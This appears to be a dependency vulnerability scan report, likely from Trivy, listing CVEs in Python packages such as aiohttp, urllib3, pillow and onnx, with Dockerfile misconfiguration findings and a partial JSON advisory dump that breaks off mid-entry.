Critical
High
Medium
Low
Secrets
Misconfig
| Severity | CVE ID | Package | Installed | Fixed In | Description |
|---|---|---|---|---|---|
| HIGH | CVE-2025-69223 | aiohttp | 3.13.2 | 3.13.3 | aiohttp: AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb |
| MEDIUM | CVE-2025-69227 | aiohttp | 3.13.2 | 3.13.3 | aiohttp: aiohttp: Denial of Service via specially crafted POST request |
| MEDIUM | CVE-2025-69228 | aiohttp | 3.13.2 | 3.13.3 | aiohttp: aiohttp: Denial of Service via memory exhaustion from crafted POST request |
| MEDIUM | CVE-2025-69229 | aiohttp | 3.13.2 | 3.13.3 | aiohttp: AIOHTTP: Denial of Service via excessive CPU usage in chunked message handling |
| MEDIUM | CVE-2026-22815 | aiohttp | 3.13.2 | 3.13.4 | aiohttp: AIOHTTP: Denial of Service via insufficient header/trailer handling |
| MEDIUM | CVE-2026-34515 | aiohttp | 3.13.2 | 3.13.4 | aiohttp: AIOHTTP: Information disclosure via static resource handler on Windows |
| MEDIUM | CVE-2026-34516 | aiohttp | 3.13.2 | 3.13.4 | aiohttp: AIOHTTP: Denial of Service via excessive multipart headers |
| MEDIUM | CVE-2026-34525 | aiohttp | 3.13.2 | 3.13.4 | aiohttp: aiohttp: Security bypass via multiple Host headers |
| MEDIUM | CVE-2026-34993 | aiohttp | 3.13.2 | 3.14.0 | aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load() |
| MEDIUM | CVE-2026-47265 | aiohttp | 3.13.2 | 3.14.0 | python-aiohttp: AIOHTTP: Information disclosure via improper handling of cookies during cross-origin |
| MEDIUM | CVE-2026-54273 | aiohttp | 3.13.2 | 3.14.1 | AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ... |
| MEDIUM | CVE-2026-54274 | aiohttp | 3.13.2 | 3.14.1 | AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ... |
| MEDIUM | CVE-2026-54276 | aiohttp | 3.13.2 | 3.14.1 | AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ... |
| MEDIUM | CVE-2026-54277 | aiohttp | 3.13.2 | 3.14.1 | AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ... |
| MEDIUM | CVE-2026-54278 | aiohttp | 3.13.2 | 3.14.1 | AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ... |
| MEDIUM | CVE-2025-68146 | filelock | 3.19.1 | 3.20.1 | filelock: filelock: Time-of-Check-Time-of-Use (TOCTOU) race condition and symlink attack allows arbi |
| MEDIUM | CVE-2026-22701 | filelock | 3.19.1 | 3.20.3 | filelock: filelock Time-of-Check-Time-of-Use (TOCTOU) in SoftFileLock |
| MEDIUM | CVE-2026-45409 | idna | 3.10 | 3.15 | Internationalized Domain Names in Applications (IDNA) for Python provi ... |
| HIGH | GHSA-6v7p-g79w-8964 | msgpack | 1.1.2 | 1.2.1 | MessagePack for Python: Out-of-bounds read / crash on Unpacker reuse after a caught error |
| HIGH | CVE-2026-27489 | onnx | 1.17.0 | 1.21.0 | onnx: ONNX: Information Disclosure via Path Traversal Vulnerability |
| HIGH | CVE-2026-28500 | onnx | 1.17.0 | 1.21.0rc1 | onnx: ONNX: Untrusted Model Repository Warnings Suppressed |
| HIGH | CVE-2026-34445 | onnx | 1.17.0 | 1.21.0 | ONNX: ONNX: Denial of Service and potential information disclosure via malicious model metadata |
| HIGH | GHSA-q56x-g2fj-4rj6 | onnx | 1.17.0 | 1.21.0 | ONNX: TOCTOU arbitrary file read/write in save_external_dat |
| MEDIUM | CVE-2026-34446 | onnx | 1.17.0 | 1.21.0 | onnx: ONNX: Information disclosure through hardlink path traversal |
| MEDIUM | CVE-2026-34447 | onnx | 1.17.0 | 1.21.0 | Open Neural Network Exchange (ONNX) is an open standard for machine le ... |
| HIGH | CVE-2026-25990 | pillow | 12.0.0 | 12.1.1 | pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image |
| HIGH | CVE-2026-40192 | pillow | 12.0.0 | 12.2.0 | Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing |
| HIGH | CVE-2026-42311 | pillow | 12.0.0 | 12.2.0 | Pillow is a Python imaging library. From version 10.3.0 to before vers ... |
| MEDIUM | CVE-2026-42308 | pillow | 12.0.0 | 12.2.0 | Pillow: python: Pillow: Denial of Service via integer overflow in font processing |
| MEDIUM | CVE-2026-42309 | pillow | 12.0.0 | 12.2.0 | Pillow: Pillow: Denial of Service via specially crafted coordinate input |
| MEDIUM | CVE-2026-42310 | pillow | 12.0.0 | 12.2.0 | Pillow: Pillow: Denial of Service via malicious PDF processing |
| HIGH | CVE-2026-0994 | protobuf | 6.33.2 | 6.33.5, 5.29.6 | python: protobuf: Protobuf: Denial of Service due to recursion depth bypass |
| MEDIUM | CVE-2026-28684 | python-dotenv | 1.1.0 | 1.2.2 | python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following |
| HIGH | CVE-2026-24486 | python-multipart | 0.0.20 | 0.0.22 | python-multipart: Python-Multipart: Arbitrary file write via path traversal vulnerability |
| HIGH | CVE-2026-42561 | python-multipart | 0.0.20 | 0.0.27 | Python-Multipart is a streaming multipart parser for Python. Prior to ... |
| HIGH | CVE-2026-53539 | python-multipart | 0.0.20 | 0.0.30 | Python-Multipart is a streaming multipart parser for Python. Prior to ... |
| MEDIUM | CVE-2026-40347 | python-multipart | 0.0.20 | 0.0.26 | python-multipart: Python-Multipart: Denial of Service via crafted multipart/form-data requests |
| MEDIUM | CVE-2026-25645 | requests | 2.32.5 | 2.33.0 | requests: Requests: Security bypass due to predictable temporary file creation |
| HIGH | CVE-2026-48818 | starlette | 0.50.0 | 1.1.0 | starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows |
| HIGH | CVE-2026-54283 | starlette | 0.50.0 | 1.3.1 | Starlette is a lightweight ASGI framework/toolkit. From 0.4.1 until 1. ... |
| MEDIUM | CVE-2026-48710 | starlette | 0.50.0 | 1.0.1 | starlette: Starlette: Security restriction bypass via malformed HTTP Host header |
| MEDIUM | CVE-2026-48817 | starlette | 0.50.0 | 1.1.0 | starlette: Starlette: Information disclosure and unintended method execution via non-standard HTTP m |
| MEDIUM | CVE-2025-2999 | torch | 2.8.0 | 2.9.1 | A vulnerability was found in PyTorch 2.6.0. It has been rated as criti ... |
| HIGH | CVE-2026-32874 | ujson | 5.10.0 | 5.12.0 | UltraJSON: UltraJSON: Denial of Service due to memory leak when parsing large integers |
| HIGH | CVE-2026-32875 | ujson | 5.10.0 | 5.12.0 | ultrajson: UltraJSON: Denial of Service via large indent parameter in JSON serialization |
| HIGH | CVE-2026-44660 | ujson | 5.10.0 | 5.12.1 | python-ujson: UltraJSON: Memory leak leading to Denial of Service |
| MEDIUM | CVE-2026-54911 | ujson | 5.10.0 | 5.13.0 | UltraJSON is a fast JSON encoder and decoder written in pure C with bi ... |
| HIGH | CVE-2026-21441 | urllib3 | 2.6.2 | 2.6.3 | urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (st |
| HIGH | CVE-2026-44431 | urllib3 | 2.6.2 | 2.7.0 | urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers |
| HIGH | CVE-2026-44432 | urllib3 | 2.6.2 | 2.7.0 | urllib3: urllib3: Denial of Service due to excessive HTTP response decompression |
| MEDIUM | CVE-2026-45409 | idna | 3.10 | 3.15 | Internationalized Domain Names in Applications (IDNA) for Python provi ... |
| MEDIUM | CVE-2026-28684 | python-dotenv | 1.1.0 | 1.2.2 | python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following |
| MEDIUM | CVE-2024-47081 | requests | 2.32.3 | 2.32.4 | requests: Requests vulnerable to .netrc credentials leak via malicious URLs |
| MEDIUM | CVE-2026-25645 | requests | 2.32.3 | 2.33.0 | requests: Requests: Security bypass due to predictable temporary file creation |
| HIGH | CVE-2025-66418 | urllib3 | 2.4.0 | 2.6.0 | urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion |
| HIGH | CVE-2025-66471 | urllib3 | 2.4.0 | 2.6.0 | urllib3: urllib3 Streaming API improperly handles highly compressed data |
| HIGH | CVE-2026-21441 | urllib3 | 2.4.0 | 2.6.3 | urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (st |
| HIGH | CVE-2026-44431 | urllib3 | 2.4.0 | 2.7.0 | urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers |
| MEDIUM | CVE-2025-50181 | urllib3 | 2.4.0 | 2.5.0 | urllib3: urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation |
| MEDIUM | CVE-2025-50182 | urllib3 | 2.4.0 | 2.5.0 | urllib3: urllib3 does not control redirects in browsers and Node.js |
| Type | File | Line | Match |
|---|---|---|---|
| ✅ No secrets found | |||
| Severity | ID | Check | File | Message |
|---|---|---|---|---|
| HIGH | DS002 | Image user should not be 'root' | Dockerfile | Specify at least 1 USER command in Dockerfile with non-root user as argument |
| HIGH | DS029 | 'apt-get' missing '--no-install-recommends' | Dockerfile | '--no-install-recommends' flag is missed: 'apt-get update && apt-get install -y python3 |
{
"SchemaVersion": 2,
"CreatedAt": "2026-06-24T06:44:29.679260552Z",
"ArtifactName": "/src",
"ArtifactType": "filesystem",
"Metadata": {
"ImageConfig": {
"architecture": "",
"created": "0001-01-01T00:00:00Z",
"os": "",
"rootfs": {
"type": "",
"diff_ids": null
},
"config": {}
}
},
"Results": [
{
"Target": "requirements.txt",
"Class": "lang-pkgs",
"Type": "pip",
"Vulnerabilities": [
{
"VulnerabilityID": "CVE-2025-69223",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-69223",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3.",
"Severity": "HIGH",
"CweIDs": [
"CWE-409",
"CWE-770"
],
"VendorSeverity": {
"ghsa": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-69223",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg",
"https://nvd.nist.gov/vuln/detail/CVE-2025-69223",
"https://ubuntu.com/security/notices/USN-8032-1",
"https://www.cve.org/CVERecord?id=CVE-2025-69223"
],
"PublishedDate": "2026-01-05T22:15:53.017Z",
"LastModifiedDate": "2026-06-17T10:00:19.217Z"
},
{
"VulnerabilityID": "CVE-2025-69227",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-69227",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: aiohttp: Denial of Service via specially crafted POST request",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow for an infinite loop to occur when assert statements are bypassed, resulting in a DoS attack when processing a POST body. If optimizations are enabled (-O or PYTHONOPTIMIZE=1), and the application includes a handler that uses the Request.post() method, then an attacker may be able to execute a DoS attack with a specially crafted message. This issue is fixed in version 3.13.3.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-835"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-69227",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23",
"https://nvd.nist.gov/vuln/detail/CVE-2025-69227",
"https://ubuntu.com/security/notices/USN-8032-1",
"https://www.cve.org/CVERecord?id=CVE-2025-69227"
],
"PublishedDate": "2026-01-06T00:15:48.053Z",
"LastModifiedDate": "2026-06-17T10:00:19.683Z"
},
{
"VulnerabilityID": "CVE-2025-69228",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-69228",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: aiohttp: Denial of Service via memory exhaustion from crafted POST request",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a request to be crafted in such a way that an AIOHTTP server's memory fills up uncontrollably during processing. If an application includes a handler that uses the Request.post() method, an attacker may be able to freeze the server by exhausting the memory. This issue is fixed in version 3.13.3.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
"V3Score": 6.8
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-69228",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf",
"https://nvd.nist.gov/vuln/detail/CVE-2025-69228",
"https://ubuntu.com/security/notices/USN-8032-1",
"https://www.cve.org/CVERecord?id=CVE-2025-69228"
],
"PublishedDate": "2026-01-06T00:15:48.203Z",
"LastModifiedDate": "2026-06-17T10:00:19.8Z"
},
{
"VulnerabilityID": "CVE-2025-69229",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-69229",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP: Denial of Service via excessive CPU usage in chunked message handling",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, handling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks. If an application makes use of the request.read() method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time. This issue is fixed in version 3.13.3.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L",
"V3Score": 5.8
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-69229",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229",
"https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq",
"https://nvd.nist.gov/vuln/detail/CVE-2025-69229",
"https://ubuntu.com/security/notices/USN-8032-1",
"https://www.cve.org/CVERecord?id=CVE-2025-69229"
],
"PublishedDate": "2026-01-06T00:15:48.347Z",
"LastModifiedDate": "2026-06-17T10:00:19.937Z"
},
{
"VulnerabilityID": "CVE-2026-22815",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.4",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-22815",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP: Denial of Service via insufficient header/trailer handling",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, insufficient restrictions in header/trailer handling could cause uncapped memory usage. This issue has been patched in version 3.13.4.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-22815",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36",
"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5",
"https://nvd.nist.gov/vuln/detail/CVE-2026-22815",
"https://www.cve.org/CVERecord?id=CVE-2026-22815"
],
"PublishedDate": "2026-04-01T21:16:58.513Z",
"LastModifiedDate": "2026-06-17T10:20:28.687Z"
},
{
"VulnerabilityID": "CVE-2026-34515",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.4",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34515",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP: Information disclosure via static resource handler on Windows",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, on Windows the static resource handler may expose information about a NTLMv2 remote path. This issue has been patched in version 3.13.4.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-36",
"CWE-918"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34515",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d",
"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34515",
"https://www.cve.org/CVERecord?id=CVE-2026-34515"
],
"PublishedDate": "2026-04-01T21:16:59.57Z",
"LastModifiedDate": "2026-06-17T10:39:09.287Z"
},
{
"VulnerabilityID": "CVE-2026-34516",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.4",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34516",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP: Denial of Service via excessive multipart headers",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, a response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability. This issue has been patched in version 3.13.4.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34516",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f",
"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34516",
"https://www.cve.org/CVERecord?id=CVE-2026-34516"
],
"PublishedDate": "2026-04-01T21:16:59.723Z",
"LastModifiedDate": "2026-06-17T10:39:09.4Z"
},
{
"VulnerabilityID": "CVE-2026-34525",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.13.4",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34525",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: aiohttp: Security bypass via multiple Host headers",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, multiple Host headers were allowed in aiohttp. This issue has been patched in version 3.13.4.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-20",
"CWE-444"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"V3Score": 5.4
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34525",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000",
"https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349",
"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34525",
"https://www.cve.org/CVERecord?id=CVE-2026-34525"
],
"PublishedDate": "2026-04-01T21:17:00.49Z",
"LastModifiedDate": "2026-06-17T10:39:10.4Z"
},
{
"VulnerabilityID": "CVE-2026-34993",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34993",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, using ``CookieJar.load()`` with untrusted input may allow arbitrary code execution. Most applications using this function will be doing so with the user's own data, so this is unlikely to affect many applications. Version 3.14.0 patches the issue. If an application does allow attacker controlled files to be loaded, a workaround on older releases would be to sanitize the files before loading.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-502"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:H/A:L",
"V3Score": 6.4
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"V3Score": 7.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"V3Score": 7.2
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34993",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"https://www.cve.org/CVERecord?id=CVE-2026-34993"
],
"PublishedDate": "2026-06-02T20:16:34.857Z",
"LastModifiedDate": "2026-06-17T10:39:57.45Z"
},
{
"VulnerabilityID": "CVE-2026-47265",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-47265",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-aiohttp: AIOHTTP: Information disclosure via improper handling of cookies during cross-origin redirects",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, cookies set with the `cookies` parameter on requests are sent after following a cross-origin redirect. If a developer uses the `cookies` parameter on a per-request basis then sensitive data might be leaked to an attacker if they manage to control a redirect. Version 3.14.0 patches the issue. If unable to upgrade, using a `Cookie` header in the `headers` parameter is not vulnerable.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-346"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-47265",
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/f54c40851b0d6c4bbdab97ba518a223adda32478",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hg6j-4rv6-33pg",
"https://nvd.nist.gov/vuln/detail/CVE-2026-47265",
"https://www.cve.org/CVERecord?id=CVE-2026-47265"
],
"PublishedDate": "2026-06-02T20:16:37.903Z",
"LastModifiedDate": "2026-06-17T10:54:26.62Z"
},
{
"VulnerabilityID": "CVE-2026-54273",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54273",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ...",
